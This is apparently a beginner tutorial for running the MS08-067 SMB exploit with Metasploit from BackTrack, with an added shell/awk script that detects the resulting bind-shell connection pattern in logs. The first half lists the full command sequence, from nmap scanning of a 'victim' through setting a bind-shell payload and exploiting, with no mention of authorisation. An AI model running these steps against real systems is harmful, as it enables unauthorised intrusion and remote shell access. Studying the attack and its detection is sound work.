What is Metasploit?
Metasploit is an open source project that provides information about vulnerabilities, along with good exploits and payloads for penetration testing.
What is nmap?
Nmap is a scanning tool that can be used to see which ports are open on someone's computer.
Enough basics... Let's begin the real fun!
Go to BackTrack and just follow my instructions.
First of all, you need to start networking in BackTrack. You can start it with this command:
root@bt:~# /etc/init.d/networking start
Now scan your victim to check whether it is up or not.
root@bt:~# nmap -sV -O <victim IP>
Now go to the framework3 directory and start msfconsole.
root@bt:~# cd /pentest/exploits/framework3
root@bt:~# msfconsole
Then you need to select the exploit you want to apply to the target.
If you don't know which exploit to apply, list them all. This and the following commands are typed at the msfconsole prompt, not at the root shell.
msf > show exploits
But I know which one to use, so I am using windows/smb/ms08_067_netapi (found with msf > search smb). This is the exploit:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST <victim IP>
Now one of the most important steps: see the targets. Here, target means the operating system you want to attack.
To see the available targets, use this command:
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > set target <target number>
Now the most important thing: selecting the payload.
Payload: the payload is the shellcode that will be executed on the target system once the exploit succeeds.
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
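Seen from the defender's side, the steps above leave a simple network pattern: a connection to SMB (TCP 445), followed shortly by a connection from the same source to a port the host does not normally serve, which is the bind-shell listener. The script below is an added example, not part of the original post, that flags this pattern in a connection log. The log format, sample lines, 60-second window and list of expected ports are all assumptions constructed for the illustration.

```shell
#!/bin/sh
# Added example: flag "SMB connection, then a connection to an unexpected
# port" from the same source to the same host.
# Assumed log format (constructed for this example): epoch src dst dport

WINDOW=60                        # max seconds between the SMB hit and the follow-up
KNOWN_PORTS="135 139 445 3389"   # ports the monitored hosts are expected to serve (assumption)

# Constructed sample data, not real traffic.
sample_log() {
cat <<'EOF'
1700000000 10.0.0.5 10.0.0.20 445
1700000004 10.0.0.5 10.0.0.20 4444
1700000100 10.0.0.7 10.0.0.20 445
1700000105 10.0.0.7 10.0.0.20 3389
1700000200 10.0.0.9 10.0.0.21 445
1700000900 10.0.0.9 10.0.0.21 5555
1700001000 10.0.0.8 10.0.0.22 8080
EOF
}

# Reads log lines on stdin, prints one ALERT line per suspicious follow-up.
detect_bind_shell() {
  awk -v window="$WINDOW" -v known="$KNOWN_PORTS" '
    BEGIN {
      n = split(known, k, " ")
      for (i = 1; i <= n; i++) ok[k[i]] = 1
    }
    {
      ts = $1; pair = $2 " " $3; port = $4
      # Remember the most recent SMB connection for each src/dst pair.
      if (port == 445) { smb[pair] = ts; next }
      # Alert when the same pair then reaches a port outside the expected set
      # within the time window.
      if ((pair in smb) && !(port in ok) && ts - smb[pair] <= window)
        printf "ALERT %s -> %s port %s (%ds after SMB)\n", $2, $3, port, ts - smb[pair]
    }'
}

sample_log | detect_bind_shell
```

Only the first source is flagged: the second connects to an expected port (3389), the third falls outside the time window, and the fourth never touched SMB.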